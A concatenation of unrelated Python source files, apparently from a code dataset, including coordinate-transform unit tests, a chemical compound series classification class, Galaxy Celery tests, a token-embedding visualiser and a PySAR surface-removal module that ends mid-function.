from spatialmath.base.transformsNd import *
from spatialmath.base.transforms3d import trotx, transl, rotx, isrot, ishom
from spatialmath.base.transforms2d import trot2, transl2, rot2, isrot2, ishom2
from spatialmath.base import sym
import matplotlib.pyplot as plt
class TestND(unittest.TestCase):
def test_iseye(self):
self.assertTrue(iseye(np.eye(1)))
self.assertTrue(iseye(np.eye(2)))
self.assertTrue(iseye(np.eye(3)))
self.assertTrue(iseye(np.eye(5)))
self.assertFalse(iseye(2 * np.eye(3)))
self.assertFalse(iseye(-np.eye(3)))
self.assertFalse(iseye(np.array([[1, 0, 0], [0, 1, 0]])))
self.assertFalse(iseye(np.array([1, 0, 0])))
def test_r2t(self):
# 3D
R = rotx(0.3)
T = r2t(R)
nt.assert_array_almost_equal(T[0:3,3], np.r_[0,0,0])
nt.assert_array_almost_equal(T[:3,:3], R)
theta = sym.symbol('theta')
R = rotx(theta)
T = r2t(R)
self.assertEqual(r2t(R).dtype, 'O')
nt.assert_array_almost_equal(T[0:3,3], np.r_[0,0,0])
# nt.assert_array_almost_equal(T[:3,:3], R)
self.assertTrue((T[:3,:3] == R).all())
# 2D
R = rot2(0.3)
T = r2t(R)
nt.assert_array_almost_equal(T[0:2,2], np.r_[0,0])
nt.assert_array_almost_equal(T[:2,:2], R)
theta = sym.symbol('theta')
R = rot2(theta)
T = r2t(R)
self.assertEqual(r2t(R).dtype, 'O')
nt.assert_array_almost_equal(T[0:2,2], np.r_[0,0])
nt.assert_array_almost_equal(T[:2,:2], R)
with self.assertRaises(ValueError):
r2t(3)
with self.assertRaises(ValueError):
r2t(np.eye(3,4))
def test_t2r(self):
# 3D
t=[1,2,3]
T = trotx(0.3, t=t)
R = t2r(T)
nt.assert_array_almost_equal(T[:3,:3], R)
nt.assert_array_almost_equal(transl(T), np.array(t))
# 2D
t=[1,2]
T = trot2(0.3, t=t)
R = t2r(T)
nt.assert_array_almost_equal(T[:2,:2], R)
nt.assert_array_almost_equal(transl2(T), np.array(t))
with self.assertRaises(ValueError):
t2r(3)
with self.assertRaises(ValueError):
r2t(np.eye(3,4))
def test_rt2tr(self):
# 3D
R = rotx(0.2)
t = [3, 4, 5]
T = rt2tr(R, t)
nt.assert_array_almost_equal(t2r(T), R)
nt.assert_array_almost_equal(transl(T), np.array(t))
theta = sym.symbol('theta')
R = rotx(theta)
self.assertEqual(r2t(R).dtype, 'O')
# 2D
R = rot2(0.2)
t = [3, 4]
T = rt2tr(R, t)
nt.assert_array_almost_equal(t2r(T), R)
nt.assert_array_almost_equal(transl2(T), np.array(t))
theta = sym.symbol('theta')
R = rot2(theta)
self.assertEqual(r2t(R).dtype, 'O')
with self.assertRaises(ValueError):
rt2tr(3, 4)
with self.assertRaises(ValueError):
rt2tr(np.eye(3,4), [1,2,3,4])
def test_tr2rt(self):
# 3D
T = trotx(0.3, t=[1,2,3])
R, t = tr2rt(T)
nt.assert_array_almost_equal(T[:3,:3], R)
nt.assert_array_almost_equal(T[:3,3], t)
# 2D
T = trot2(0.3, t=[1,2])
R, t = tr2rt(T)
nt.assert_array_almost_equal(T[:2,:2], R)
nt.assert_array_almost_equal(T[:2,2], t)
with self.assertRaises(ValueError):
R, t = tr2rt(3)
with self.assertRaises(ValueError):
R, t = tr2rt(np.eye(3,4))
def test_checks(self):
# 3D case, with rotation matrix
R = np.eye(3)
self.assertTrue(isR(R))
self.assertFalse(isrot2(R))
self.assertTrue(isrot(R))
self.assertFalse(ishom(R))
self.assertTrue(ishom2(R))
self.assertFalse(isrot2(R, True))
self.assertTrue(isrot(R, True))
self.assertFalse(ishom(R, True))
self.assertTrue(ishom2(R, True))
# 3D case, invalid rotation matrix
R = np.eye(3)
R[0, 1] = 2
self.assertFalse(isR(R))
self.assertFalse(isrot2(R))
self.assertTrue(isrot(R))
self.assertFalse(ishom(R))
self.assertTrue(ishom2(R))
self.assertFalse(isrot2(R, True))
self.assertFalse(isrot(R, True))
self.assertFalse(ishom(R, True))
self.assertFalse(ishom2(R, True))
# 3D case, with rotation matrix
T = np.array([[1, 0, 0, 3], [0, 1, 0, 4], [0, 0, 1, 5], [0, 0, 0, 1]])
self.assertFalse(isR(T))
self.assertFalse(isrot2(T))
self.assertFalse(isrot(T))
self.assertTrue(ishom(T))
self.assertFalse(ishom2(T))
self.assertFalse(isrot2(T, True))
self.assertFalse(isrot(T, True))
self.assertTrue(ishom(T, True))
self.assertFalse(ishom2(T, True))
# 3D case, invalid rotation matrix
T = np.array([[1, 0, 0, 3], [0, 1, 1, 4], [0, 0, 1, 5], [0, 0, 0, 1]])
self.assertFalse(isR(T))
self.assertFalse(isrot2(T))
self.assertFalse(isrot(T))
self.assertTrue(ishom(T),)
self.assertFalse(ishom2(T))
self.assertFalse(isrot2(T, True))
self.assertFalse(isrot(T, True))
self.assertFalse(ishom(T, True))
self.assertFalse(ishom2(T, True))
# 3D case, invalid bottom row
T = np.array([[1, 0, 0, 3], [0, 1, 1, 4], [0, 0, 1, 5], [9, 0, 0, 1]])
self.assertFalse(isR(T))
self.assertFalse(isrot2(T))
self.assertFalse(isrot(T))
self.assertTrue(ishom(T))
self.assertFalse(ishom2(T))
self.assertFalse(isrot2(T, True))
self.assertFalse(isrot(T, True))
self.assertFalse(ishom(T, True))
self.assertFalse(ishom2(T, True))
# skew matrices
S = np.array([
[0, 2],
[-2, 0]])
nt.assert_equal(isskew(S), True)
S[0, 0] = 1
nt.assert_equal(isskew(S), False)
S = np.array([
[0, -3, 2],
[3, 0, -1],
[-2, 1, 0]])
nt.assert_equal(isskew(S), True)
S[0, 0] = 1
nt.assert_equal(isskew(S), False)
def test_homog(self):
nt.assert_almost_equal(e2h([1, 2, 3]), np.c_[1, 2, 3, 1].T)
nt.assert_almost_equal(h2e([2, 4, 6, 2]), np.c_[1, 2, 3].T)
def test_homtrans(self):
#3D
T = trotx(pi/2, t=[1,2,3])
v = [10,12,14]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[11, -12, 15].T)
v = np.c_[[10,12,14], [-3,-4,-5]]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[[11, -12, 15], [-2,7,-1]])
#2D
T = trot2(pi/2, t=[1,2])
v = [10,12]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[-11, 12].T)
v = np.c_[[10,12], [-3,-4]]
v2 = homtrans(T, v)
nt.assert_almost_equal(v2, np.c_[[-11, 12], [5, -1]])
with self.assertRaises(ValueError):
T = trotx(pi/2, t=[1,2,3])
v = [10,12]
v2 = homtrans(T, v)
def test_skew(self):
# 3D
sk = skew([1, 2, 3])
self.assertEqual(sk.shape, (3,3))
nt.assert_almost_equal(sk + sk.T, np.zeros((3,3)))
self.assertEqual(sk[2,1], 1)
self.assertEqual(sk[0,2], 2)
self.assertEqual(sk[1,0], 3)
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0,0])
# 2D
sk = skew([1])
self.assertEqual(sk.shape, (2,2))
nt.assert_almost_equal(sk + sk.T, np.zeros((2,2)))
self.assertEqual(sk[1,0], 1)
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0])
with self.assertRaises(ValueError):
sk = skew([1,2])
def test_vex(self):
# 3D
t = [3, 4, 5]
sk = skew(t)
nt.assert_almost_equal(vex(sk), t)
# 2D
t = [3]
sk = skew(t)
nt.assert_almost_equal(vex(sk), t)
def test_isskew(self):
t = [3, 4, 5]
sk = skew(t)
self.assertTrue(isskew(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
# 2D
t = [3]
sk = skew(t)
self.assertTrue(isskew(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
def test_isskewa(self):
# 3D
t = [3, 4, 5, 6, 7, 8]
sk = skewa(t)
self.assertTrue(isskewa(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
sk = skewa(t)
sk[3,3] = 3
self.assertFalse(isskew(sk))
# 2D
t = [3, 4, 5]
sk = skew(t)
self.assertTrue(isskew(sk))
sk[0,0] = 3
self.assertFalse(isskew(sk))
sk = skewa(t)
sk[2,2] = 3
self.assertFalse(isskew(sk))
def test_skewa(self):
# 3D
sk = skewa([1, 2, 3, 4, 5, 6])
self.assertEqual(sk.shape, (4,4))
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0,0,0])
nt.assert_almost_equal(sk[-1,:], np.r_[0,0,0,0])
nt.assert_almost_equal(sk[:3,3], [1, 2, 3])
nt.assert_almost_equal(vex(sk[:3,:3]), [4,5,6])
# 2D
sk = skewa([1, 2, 3])
self.assertEqual(sk.shape, (3,3))
nt.assert_almost_equal(sk.diagonal(), np.r_[0,0,0])
nt.assert_almost_equal(sk[-1,:], np.r_[0,0,0])
nt.assert_almost_equal(sk[:2,2], [1, 2])
nt.assert_almost_equal(vex(sk[:2,:2]), [3])
with self.assertRaises(ValueError):
sk = skew([1,2])
def test_vexa(self):
# 3D
t = [1, 2, 3, 4, 5, 6]
sk = skewa(t)
nt.assert_almost_equal(vexa(sk), t)
# 2D
t = [1, 2, 3]
sk = skewa(t)
nt.assert_almost_equal(vexa(sk), t)
def test_det(self):
a = np.array([[1, 2], [3, 4]])
self.assertAlmostEqual(np.linalg.det(a), det(a))
x, y = sym.symbol('x y')
a = np.array([[x, y], [y, x]])
self.assertEqual(det(a), x**2 - y**2)
# ---------------------------------------------------------------------------------------#
if __name__ == '__main__':
unittest.main()
| 2.3125 | 2 |
src/automated_series_classification/mainSeriesClassification.py | yamasakih/AutomatedSeriesClassification | 12 | 12762224 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 27 16:40:49 2020
@author: krugefr1
"""
import numpy as np
import os
try:
import arthor
except ImportError:
arthor = None
from rdkit import Chem
from rdkit.Chem import rdSubstructLibrary
import pickle
import random
import pandas as pd
import copy
from automated_series_classification import UPGMAclustering, Butinaclustering, utilsDataPrep
class Classification:
def __init__(self,
proj,
datapath,
dbpath,
filename,
chembldb,
flimit=1e-3,
MinClusterSize=20,
clustering='UPGMA',
calcDists=True,
calcScores=False,
smilesCol='Smiles',
idCol='ID',
onlyCompleteRings=False,
useArthor=True):
global arthor
if not useArthor:
arthor = None
self.useArthor = useArthor
self.proj = proj
self.datapath = datapath
self.dbpath = dbpath
self.chembldb = chembldb
self.flimit = flimit
self.MinClusterSize = MinClusterSize
self.clustering = clustering
self.calcScores = calcScores
self.calcDists = calcDists
self.smilesCol = smilesCol
self.idCol = idCol
self.onlyCompleteRings = onlyCompleteRings
# load data
self.moldata_proj, self.distdata_proj = utilsDataPrep.PrepareData(
self.proj,
self.datapath,
filename,
distMeasure='Tanimoto',
FP='Morgan2',
calcDists=self.calcDists,
smilesCol=smilesCol)
if arthor is not None:
if not os.path.isdir(dbpath):
os.mkdir(dbpath)
# set up project database for arthor substructure matching
df = self.moldata_proj[[smilesCol, idCol]]
df.to_csv('./arthor/{0}.smi'.format(self.proj),
header=None,
index=None,
sep=' ')
os.system('smi2atdb -j 0 -l {0}{1}.smi {0}{1}.atdb'.format(
self.dbpath, self.proj))
os.system('atdb2fp -j 0 {0}{1}.atdb'.format(
self.dbpath, self.proj))
self.proj_db = arthor.SubDb('{0}{1}.atdb'.format(
self.dbpath, self.proj))
else:
if type(dbpath) == rdSubstructLibrary.SubstructLibrary:
self.proj_db = dbpath
self.db_size = len(self.proj_db)
else:
if not os.path.exists(dbpath):
print("creating database")
mols = rdSubstructLibrary.CachedTrustedSmilesMolHolder()
fps = rdSubstructLibrary.PatternHolder()
for smi in self.moldata_proj[smilesCol]:
m = Chem.MolFromSmiles(smi)
mols.AddSmiles(Chem.MolToSmiles(m))
fps.AddFingerprint(Chem.PatternFingerprint(m))
self.proj_db = rdSubstructLibrary.SubstructLibrary(
mols, fps)
self.db_size = len(mols)
pickle.dump(self.proj_db, open(dbpath, 'wb+'))
else:
self.proj_db = pickle.load(open(dbpath, 'rb'))
self.db_size = len(self.proj_db)
def AssignSeriesToMCS(self, MCSdict):
# assign series to MCS of selected clusters
smartslist = [v[2] for v in MCSdict.values()]
MolAssign_prel = {}
MolAssignment = {}
for s in range(len(smartslist)):
if arthor is not None:
res = self.proj_db.search(smartslist[s])
mols = [int(i) for i in res.to_array()]
else:
mols = self.proj_db.GetMatches(Chem.MolFromSmarts(
smartslist[s]),
maxResults=self.db_size)
MolAssign_prel[list(MCSdict.keys())[s]] = list(mols)
# remove all series that are entirely in another series
for key1 in MolAssign_prel.keys():
add = 1
for key2 in MolAssign_prel.keys():
if key2 != key1:
if set(MolAssign_prel[key1]).issubset(
set(MolAssign_prel[key2])):
if set(MolAssign_prel[key2]).issubset(
set(MolAssign_prel[key1])) and (
MCSdict[key1][0] >= MCSdict[key2][0]):
add = 1
else:
add = 0
break
if add == 1 and MolAssign_prel[key1] not in MolAssignment.values():
MolAssignment[key1] = MolAssign_prel[key1]
MolAssignment = {
k: MolAssignment[k]
for k in MolAssignment.keys()
if len(MolAssignment[k]) > self.MinClusterSize
}
if self.calcScores:
MCSdict = {
k: (MCSdict[k][0], len(MolAssignment[k]), MCSdict[k][2],
MCSdict[k][3], MolAssignment[k])
for k in MolAssignment.keys()
}
else:
MCSdict = {
k: (MCSdict[k][0], len(MolAssignment[k]), MCSdict[k][2],
MolAssignment[k])
for k in MolAssignment.keys()
}
return MolAssignment, MCSdict
def ApplyClustering(self):
# apply custering and calculate MCS
if self.clustering == 'UPGMA':
MCSdict = UPGMAclustering.ApplyUPGMA(
self.distdata_proj,
self.moldata_proj,
self.chembldb,
self.flimit,
self.MinClusterSize,
self.calcScores,
onlyCompleteRings=self.onlyCompleteRings,
useArthor=self.useArthor)
elif self.clustering == 'Butina':
distdata = copy.deepcopy(self.distdata_proj)
MCSdict = Butinaclustering.ApplyButina(distdata,
self.moldata_proj,
self.chembldb,
self.flimit,
self.MinClusterSize,
self.calcScores,
useArthor=self.useArthor)
else:
print('Clustering algorithm not implemented.')
return
# assign series through substructure matching and filtering
self.MolAssignment, self.MCSdict = self.AssignSeriesToMCS(MCSdict)
# prepare and save output
self.moldata_proj['ClusterID'] = [
list() for x in range(self.moldata_proj.shape[0])
]
for k, vs in self.MolAssignment.items():
for v in vs:
self.moldata_proj['ClusterID'].iloc[v].append(k)
if self.clustering == 'UPGMA':
self.moldata_proj.to_csv('{0}moldata_UPGMA.csv'.format(
self.datapath))
with open('{0}ClusterData_UPGMA.pkl'.format(self.datapath),
'wb') as fileout:
pickle.dump(self.MCSdict, fileout)
elif self.clustering == 'Butina':
self.moldata_proj.to_csv('{0}moldata_Butina.csv'.format(
self.datapath))
with open('{0}ClusterData_Butina.pkl'.format(self.datapath),
'wb') as fileout:
pickle.dump(self.MCSdict, fileout)
else:
print('Clustering algorithm not implemented.')
return
def CalculatePerformance(self, seriescolumn='series assignment'):
# benchmark the automated classification against a different (probably human-defined) classification
# human-defined compound assignment is specified in the column "seriescolumn" of the dataframe "moldata"
# automated classification assignment specified in dict "MolAssignment"
# calculates F1 score of automatically-identified series w.r.t. to all human-defined series, then links
# each automatically-identified series to the human-defined series with highest F1 score
scaflist = list(set(self.moldata_proj['scaffold'].tolist()))
scaflist.sort()
intersect_matrix = np.zeros((len(scaflist), len(self.MolAssignment)))
NMatchScaf = []
NMatchCluster = np.array([len(v) for v in self.MolAssignment.values()])
for scaf_ind in range(len(scaflist)):
mollist = self.moldata_proj[self.idCol].loc[self.moldata_proj[
seriescolumn].map(lambda x: scaflist[scaf_ind] in x)].tolist()
intersect_scaf = np.array([
len(list(set(mollist) & set(clusterlist)))
for clusterlist in self.MolAssignment.values()
])
intersect_matrix[scaf_ind, :] = intersect_scaf
NMatchScaf.append(len(mollist))
NMatchScaf = np.array(NMatchScaf)
RecallMatrix = intersect_matrix / NMatchScaf[:, None]
PrecMatrix = intersect_matrix / NMatchCluster[None, :]
Fscore = (2 * RecallMatrix * PrecMatrix) / (RecallMatrix + PrecMatrix +
1e-9)
maxscore = np.argmax(Fscore, axis=0)
PrecVector = np.zeros(len(self.MolAssignment))
RecallVector = np.zeros(len(self.MolAssignment))
FscoreVector = np.zeros(len(self.MolAssignment))
LinkVector = []
for col in range(len(self.MolAssignment)):
PrecVector[col] = PrecMatrix[maxscore[col], col]
RecallVector[col] = RecallMatrix[maxscore[col], col]
FscoreVector[col] = Fscore[maxscore[col], col]
LinkVector.append((list(self.MolAssignment.keys())[col],
scaflist[maxscore[col]]))
LinkVector = np.array(LinkVector)
self.PerformanceClusters = {
'recall': RecallVector,
'precision': PrecVector,
'Fscore': FscoreVector,
'linked series': LinkVector
}
if self.clustering == 'UPGMA':
with open('{0}PerformanceData_UPGMA.pkl'.format(self.datapath),
'wb') as fileout:
pickle.dump(self.PerformanceClusters, fileout)
elif self.clustering == 'Butina':
with open('{0}PerformanceData_Butina.pkl'.format(self.datapath),
'wb') as fileout:
pickle.dump(self.PerformanceClusters, fileout)
else:
print('Clustering algorithm not implemented.')
return
def ClassificationCrossValidation(self, fraction_sample, N_sample):
samplerange = np.arange(len(self.moldata_proj))
invfrac = 1 / fraction_sample
self.SampledSeries = {}
for i in range(N_sample):
# random sampling
random.seed((i + 1) * 10)
molinds = random.sample(population=samplerange.tolist(),
k=int(
len(samplerange.tolist()) // invfrac))
moldata_sample = self.moldata_proj.iloc[molinds]
distdata_sample = self.distdata_proj[molinds, :]
distdata_sample = distdata_sample[:, molinds]
# apply custering and calculate MCS
if self.clustering == 'UPGMA':
MCSdict_sampled = UPGMAclustering.ApplyUPGMA(
distdata_sample,
moldata_sample,
self.chembldb,
self.flimit,
self.MinClusterSize,
self.calcScores,
useArthor=self.useArthor)
elif self.clustering == 'Butina':
MCSdict_sampled = Butinaclustering.ApplyButina(
distdata_sample,
moldata_sample,
self.chembldb,
self.flimit,
self.MinClusterSize,
self.calcScores,
useArthor=self.useArthor)
else:
print('Clustering algorithm not implemented.')
return
# assign series through substructure matching and filtering
MolAssignment_sampled, MCSdict_sampled = self.AssignSeriesToMCS(
MCSdict_sampled)
self.SampledSeries[i] = MCSdict_sampled
if self.clustering == 'UPGMA':
with open(
'{0}SampledSeries{1}_UPGMA.pkl'.format(
self.datapath, int(fraction_sample * 100)),
'wb') as fileout:
pickle.dump(self.SampledSeries, fileout)
elif self.clustering == 'Butina':
with open(
'{0}SampledSeries{1}_Butina.pkl'.format(
self.datapath, int(fraction_sample * 100)),
'wb') as fileout:
pickle.dump(self.SampledSeries, fileout)
else:
print('Clustering algorithm not implemented.')
return
return
def EvaluationCrossValidation(self):
# Compare the classification obtained from sampling ("SampledSeries") against the original classification ("MCSdict")
self.EvalCrossval = pd.DataFrame(
columns=['series id', 'repetition', 'fscore'])
for rep in self.SampledSeries.keys():
rep_dict = self.SampledSeries[rep]
keylist = [k for k in rep_dict.keys()]
for k in self.MCSdict.keys():
intersect = [
len(set(self.MCSdict[k][-1]) & set(v[-1]))
for v in rep_dict.values()
]
recall = np.array([
intersect[i] / len(rep_dict[keylist[i]][-1])
for i in range(len(keylist))
])
precision = np.array(intersect) / len(self.MCSdict[k][-1])
fscore = max(2 * recall * precision /
(recall + precision + 1e-9))
row = [int(k), int(rep), fscore]
self.EvalCrossval.loc[len(self.EvalCrossval)] = row
self.EvalCrossval['series id'] = self.EvalCrossval['series id'].apply(
int)
| 2.203125 | 2 |
test/integration/test_celery_tasks.py | beatrizserrano/galaxy | 0 | 12762225 | <gh_stars>0
from celery import shared_task
from galaxy.celery import galaxy_task
from galaxy.celery.tasks import purge_hda
from galaxy.model import HistoryDatasetAssociation
from galaxy.schema.schema import CreatePagePayload
from galaxy_test.base.populators import (
DatasetPopulator,
wait_on,
)
from galaxy_test.driver.integration_util import (
IntegrationTestCase,
UsesCeleryTasks,
)
@shared_task
def mul(x, y):
return x * y
@galaxy_task
def process_page(request: CreatePagePayload):
# an example task that consumes a pydantic model
return f"content_format is {request.content_format} with annotation {request.annotation}"
class CeleryTasksIntegrationTestCase(IntegrationTestCase, UsesCeleryTasks):
def setUp(self):
super().setUp()
self.dataset_populator = DatasetPopulator(self.galaxy_interactor)
def test_random_simple_task_to_verify_framework_for_testing(self):
assert mul.delay(4, 4).get(timeout=10) == 16
def test_task_with_pydantic_argument(self):
request = CreatePagePayload(
content_format="markdown",
title="my cool title",
slug="my-cool-title",
annotation="my cool annotation",
)
assert (
process_page.delay(request).get(timeout=10)
== "content_format is markdown with annotation my cool annotation"
)
def test_galaxy_task(self):
history_id = self.dataset_populator.new_history()
dataset = self.dataset_populator.new_dataset(history_id, wait=True)
hda = self._latest_hda
assert hda
def hda_purged():
latest_details = self.dataset_populator.get_history_dataset_details(
history_id, dataset=dataset, assert_ok=False, wait=False
)
return True if latest_details["purged"] else None
assert not hda_purged()
purge_hda.delay(hda_id=hda.id).get(timeout=10)
wait_on(hda_purged, "dataset to become purged")
assert hda_purged()
@property
def _latest_hda(self):
latest_hda = (
self._app.model.session.query(HistoryDatasetAssociation)
.order_by(HistoryDatasetAssociation.table.c.id.desc())
.first()
)
return latest_hda
| 2.09375 | 2 |
tests/test_collection.py | mpkato/openliveq | 5 | 12762226 | import openliveq as olq
import pytest
import os
from .test_base import TestBase
class TestCollection(TestBase):
def test_df(self, c):
result = c.df
assert result["社会保険事務所"] == 1
assert result["国民年金"] == 4
def test_cf(self, c):
result = c.cf
assert result["社会保険事務所"] > 1
assert result["国民年金"] > 4
@pytest.fixture
def c(self, parsed_questions):
result = olq.Collection()
for ws in parsed_questions:
result.add(ws)
return result
@pytest.fixture
def ff(self):
return olq.FeatureFactory()
@pytest.fixture
def parsed_questions(self, ff, questions):
result = []
for q in questions:
result.append(ff.parse_question(q))
return result
| 2.296875 | 2 |
src/utils/embeddingvis.py | fatterbetter/CodeSearchNet | 1,681 | 12762227 | <reponame>fatterbetter/CodeSearchNet
#!/usr/bin/env python
"""
Usage:
embeddingvis.py [options] plot-tsne (--code | --query) MODEL_PATH
embeddingvis.py [options] print-nns (--code | --query) MODEL_PATH DISTANCE_THRESHOLD
Options:
--azure-info=<path> Azure authentication information file (JSON). Used to load data from Azure storage.
--distance-metric METRIC The distance metric to use [default: cosine]
--num-nns NUM The number of nearest neighbors to show when print-nns. [default: 2]
--lim-items NUM Maximum number of items to use. Useful when memory is limited. [default: -1]
-h --help Show this screen.
--hypers-override HYPERS JSON dictionary overriding hyperparameter values.
--language LANG The code language to use. Only when --code option is given. [default: python]
--debug Enable debug routines. [default: False]
"""
from docopt import docopt
from dpu_utils.utils import RichPath, run_and_debug
from sklearn.manifold import TSNE
import numpy as np
from scipy.spatial.distance import pdist
import matplotlib.pyplot as plt
import model_restore_helper
from utils.visutils import square_to_condensed
def run(arguments) -> None:
azure_info_path = arguments.get('--azure-info', None)
model_path = RichPath.create(arguments['MODEL_PATH'], azure_info_path=azure_info_path)
model = model_restore_helper.restore(
path=model_path,
is_train=False)
if arguments['--query']:
embeddings, elements = model.get_query_token_embeddings()
else:
embeddings, elements = model.get_code_token_embeddings(arguments['--language'])
max_num_elements = int(arguments['--lim-items'])
if max_num_elements > 0:
embeddings, elements = embeddings[:max_num_elements], elements[:max_num_elements]
print(f'Collected {len(elements)} elements to visualize.')
embeddings = model.sess.run(fetches=embeddings)
if arguments['plot-tsne']:
emb_2d = TSNE(n_components=2, verbose=1, metric=arguments['--distance-metric']).fit_transform(embeddings)
plt.scatter(emb_2d[:, 0], emb_2d[:, 1])
for i in range(len(elements)):
plt.annotate(elements[i], xy=(emb_2d[i,0], emb_2d[i,1]))
plt.show()
elif arguments['print-nns']:
flat_distances = pdist(embeddings, arguments['--distance-metric'])
num_nns = int(arguments['--num-nns'])
for i, element in enumerate(elements):
distance_from_i = np.fromiter(
(flat_distances[square_to_condensed(i, j, len(elements))] if i != j else float('inf') for j in
range(len(elements))), dtype=np.float)
nns = [int(k) for k in np.argsort(distance_from_i)[:num_nns]] # The first two NNs
if distance_from_i[nns[0]] > float(arguments['DISTANCE_THRESHOLD']):
continue
try:
print(f'{element} --> ' + ', '.join(f'{elements[n]} ({distance_from_i[n]:.2f})' for n in nns))
except:
print('Error printing token for nearest neighbors pair.')
if __name__ == '__main__':
args = docopt(__doc__)
run_and_debug(lambda: run(args), args.get('--debug', False)) | 2.328125 | 2 |
lectures/primes.py | danielmccallion/pands-problems | 0 | 12762228 | <reponame>danielmccallion/pands-problems<filename>lectures/primes.py
# <NAME>
# Computing the primes
# My list of primes
p = []
# Loop through all of the numbers we're
# checking for primality
for i in range (2,10000):
# Assume that i is a prime
is_prime = True
# Look through all values j from 2 up
# to but not including i
# for j in range(2,i):
for j in p:
# See if j divides i
if i % j == 0:
# If it does, i isn't prime exit loop
# and indicate its not prime
is_prime = False
break
# If i is prime, then append to p
if is_prime:
p.append(i)
# Print out the primes
print(p)
| 4.1875 | 4 |
examples/sync/find_properties.py | OpenStuder/openstuder-client-python | 0 | 12762229 | <filename>examples/sync/find_properties.py
from openstuder import SIGatewayClient, SIProtocolError
try:
client = SIGatewayClient()
client.connect('localhost')
status, id_, count, properties = client.find_properties('*.*.3136')
print(f'Found properties for {id_}, status = {status}, count = {count} : {properties}')
except SIProtocolError as error:
print(f'Error: {error.reason()}')
| 2.25 | 2 |
40 Algorithm challenge/challenge 19.py | T0dCNg/All-In-One | 1 | 12762230 | #challenge 19
#Write an algorithm that:
# •Asks the user to input a number and repeat this until they guess the number 7.
# •Congratulate the user with a ‘Well Done’ message when they guess correctly.
num = "num"
while num != 7:
num = int(input("Please enter a number: "))
print("Well Done")
| 3.96875 | 4 |
pysar/_remove_surface.py | insarwxw/PySAR | 6 | 12762231 | #! /usr/bin/env python2
############################################################
# Program is part of PySAR v1.0 #
# Copyright(c) 2013, <NAME> #
# Author: <NAME> #
############################################################
# Yunjun, Jun 2016: merge functions for interferograms, timeseries
# into one, and use read() for all the others
# Yunjun, Aug 2016: add remove*multiple_surface()
# Recommend usage:
# import pysar._remove_surface as rm
import os
import time
import h5py
import numpy as np
import pysar._datetime as ptime
import pysar._readfile as readfile
import pysar._writefile as writefile
##################################################################
def remove_data_surface(data, mask, surf_type='plane'):
'''Remove surface from input data matrix based on pixel marked by mask'''
mask[np.isnan(data)] = 0
mask = mask.flatten(1)
z = data.flatten(1)
ndx= mask !=0
x = range(0,np.shape(data)[1])
y = range(0,np.shape(data)[0])
x1,y1 = np.meshgrid(x,y)
points = np.vstack((y1.flatten(1),x1.flatten(1))).T
if surf_type=='quadratic':
G = np.array([points[:,0]**2,points[:,1]**2,points[:,0],points[:,1],points[:,0]*points[:,1],\
np.ones(np.shape(points)[0])],np.float32).T
elif surf_type=='plane':
G = np.array([points[:,0],points[:,1],\
np.ones(np.shape(points)[0])],np.float32).T
elif surf_type == 'quadratic_range':
G = np.array([points[:,1]**2,points[:,1],\
np.ones(np.shape(points)[0])],np.float32).T
elif surf_type == 'quadratic_azimuth':
G = np.array([points[:,0]**2,points[:,0],\
np.ones(np.shape(points)[0])],np.float32).T
elif surf_type=='plane_range':
G = np.array([points[:,1],\
np.ones(np.shape(points)[0])],np.float32).T
elif surf_type=='plane_azimuth':
G = np.array([points[:,0],\
np.ones(np.shape(points)[0])],np.float32).T
z = z[ndx]
G = G[ndx]
G1=np.linalg.pinv(G)
plane = np.dot(G1,z)
if surf_type == 'quadratic':
zplane = plane[0]*y1**2 + plane[1]*x1**2 + plane[2]*y1 + plane[3]*x1 + plane[4]*y1*x1 + plane[5]
elif surf_type =='plane':
zplane = plane[0]*y1 + plane[1]*x1 + plane[2]
elif surf_type == 'quadratic_range':
zplane = plane[0]*x1**2 + plane[1]*x1 + plane[2]
elif surf_type == 'quadratic_azimuth':
zplane = plane[0]*y1**2 + plane[1]*y1 + plane[2]
elif surf_type == 'plane_range':
zplane = plane[0]*x1 + plane[1]
elif surf_type == 'plane_azimuth':
zplane = plane[0]*y1 + plane[1]
'''
## Some notes from _pysar_utilities.py remove_surface_velocity()
print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
print 'Plane parameters:'
if surf_type == 'plane_range':
print 'range gradient = ' + str(1000*plane[0][0]) + ' mm/yr/pixel'
width= float(h5file['velocity'].attrs['WIDTH'])
MaxRamp=width*1000*plane[0][0]
print 'Maximum ramp in range direction = ' + str(MaxRamp) + ' mm/yr'
h5flat['velocity'].attrs['Range_Gradient'] = str(1000*plane[0][0]) + ' mm/yr/pixel'
h5flat['velocity'].attrs['Range_Ramp'] = str(MaxRamp) + ' mm/yr'
elif surf_type == 'plane_azimuth':
print 'azimuth gradient = ' + str(1000*plane[0][0]) + ' mm/yr/pixel'
length= float(h5file['velocity'].attrs['FILE_LENGTH'])
MaxRamp=length*1000*plane[0][0]
h5flat['velocity'].attrs['Azimuth_Gradient'] = str(1000*plane[0][0]) + ' mm/yr/pixel'
h5flat['velocity'].attrs['Azimuth_Ramp'] = str(MaxRamp) +' mm/yr'
print 'Maximum ramp in azimuth direction = '+ str(MaxRamp) + ' mm/yr'
print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
'''
data_n = data - zplane
data_n[data == 0.] = 0.
data_n = np.array(data_n,data.dtype)
zplane = np.array(zplane,data.dtype)
return data_n, zplane
##################################################################
def remove_data_multiple_surface(data, mask, surf_type, ysub):
## ysub = [0,2400,2000,6800]
dataOut = np.zeros(data.shape,data.dtype)
dataOut[:] = np.nan
surfaceNum = len(ysub)/2
## 1st Mask
print 'removing 1st surface ...'
i = 0
mask_i = np.zeros(data.shape,data.dtype)
mask_i[ysub[2*i]:ysub[2*i+1],:] = mask[ysub[2*i]:ysub[2*i+1],:]
dataOut_i,ramp_i = remove_data_surface(data,mask_i,surf_type)
